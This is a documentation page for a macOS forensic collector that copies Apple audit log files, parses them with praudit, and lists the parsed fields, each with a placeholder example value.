Apple Audit Logs

Overview

Evidence: Apple Audit Logs Description: Collect Apple Audit Logs Category: System Platform: macos Short Name: audl Is Parsed: Yes Sent to Investigation Hub: Yes Collect File(s): No

Background

Apple audit logs record security-relevant events including execs, auth, and file operations. This data is essential for deep incident response and attribution.

Data Collected

This collector gathers structured data about apple audit logs.

Apple Audit Logs Data

Field

Description

Example

AuditLogFile

Audit Log File

Example value

Version

Version

123

Event

Event

Example value

Modifier

Modifier

123

Time

Time

2023-10-15 14:30:25+03:00

Msec

Msec

123

AuditUID

Audit UID

Example value

UID

UID

Example value

GID

GID

Example value

RUID

RUID

Example value

RGID

RGID

Example value

PID

PID

123

SID

SID

123

TID

TID

Example value

Errval

Errval

Example value

Retval

Retval

123

SignerType

Signer Type

123

SigningID

Signing ID

Example value

TeamID

Team ID

Example value

CDHash

CD Hash

Example value

ExecArgs

Exec Args

Example value

FullPath

Full Path

Example value

Path

Path

Example value

Collection Method

This collector copies /private/var/audit/* files and parses them using praudit -x -l, recording results into audit_log.

Forensic Value

This evidence is crucial for forensic investigations as it provides authoritative, structured audit records with process and identity context.

PreviousApache Logs NextApple System Logs (ASL)

Last updated 3 days ago

Was this helpful?